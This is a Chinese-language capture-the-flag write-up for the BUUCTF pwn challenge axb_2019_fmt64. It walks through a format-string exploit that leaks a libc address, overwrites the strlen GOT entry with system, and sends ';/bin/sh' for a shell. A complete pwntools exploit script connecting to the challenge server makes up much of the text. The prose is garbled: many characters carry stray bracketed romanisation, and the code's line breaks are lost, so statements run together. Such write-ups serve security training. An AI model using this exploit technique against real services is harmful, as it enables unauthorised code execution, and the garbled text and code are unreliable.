[BUUCTF-pwn]——axb_2019_fmt64

• 題目地址：(https://buuoj.cn/challenges#axb_2019_fmt64)[https://buuoj.cn/challenges#axb_2019_fmt64]

這是一道格式化字符串漏洞利用的題目

checksec 一看，竟然連canary都沒開，不過開不開好像都木有什么用。

在IDA中看看，可以看出明顯的字符串漏洞

首先當(dāng)然是計(jì)算偏移了，發(fā)送aaaa%4$x， 比較習(xí)慣發(fā)送這個(gè)hhhh。發(fā)現(xiàn)距離棧頂是3，還有五個(gè)寄存器的距離，So, 偏移是8。

思路

利用格式化字符串漏洞，利用偏移泄露出一個(gè)got表地址

找到libc版本，并計(jì)算偏移找到我們需要的函數(shù)

再次利用漏洞，修改我們想要利用的函數(shù)的got表，將其修改為我們需要的函數(shù)
strlen這個(gè)函數(shù)是我們經(jīng)常利用的，一般將其修改為system。

最后一次利用時(shí)，記得先輸入 ’ ; '， 因?yàn)閘inux會(huì)按照 ’ ; ’ 挨個(gè)執(zhí)行命令的

exploit

from pwn import * from LibcSearcher import LibcSearcher#p = process('./axb_2019_fmt64') p = remote("node3.buuoj.cn",25106) elf = ELF("./axb_2019_fmt64") #context.log_level = 'debug' #gdb.attach(p,'b *0x000400957') puts_got = elf.got["puts"] strlen_got = elf.got["strlen"]# 1 payload = "%9$s" + "aaaa" + p64(puts_got) p.sendafter("Please tell me:",payload) print p.recvuntil("Repeater:") puts_addr = u64(p.recvuntil('\x7f').ljust(8,'\x00')) log.success("puts_addr ---> " + hex(puts_addr)) # 2 libc = LibcSearcher('puts', puts_addr) libc_base = puts_addr - libc.dump('puts') sys = libc_base + libc.dump('system') binsh = libc_base + libc.dump("str_bin_sh") log.success("system_addr ---> "+hex(sys)) #打印的目的，就是如果出錯(cuò)，查看是否修改成功。 # 3 #一般修改前三個(gè)字節(jié)就好。后面的都是一樣的，在同一個(gè)libc中 sys_high = (sys >> 16) & 0xff sys_low = sys & 0xffff log.success('sys---->>'+hex(sys)) log.success('low---->>'+hex(sys_low)) log.success('high---->>'+hex(sys_high)) payload2 = "%" + str(sys_high - 9) + "c%12$hhn" + "%" + str(sys_low - sys_high) + "c%13$hn" payload2 = payload2.ljust(32,"A") + p64(strlen_got + 2) + p64(strlen_got)p.sendafter("Please tell me:",payload2) # 4 payload3 = ';/bin/sh\x00' p.sendafter("Please tell me:",payload3)p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[BUUCTF-pwn]——axb_2019_fmt64的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。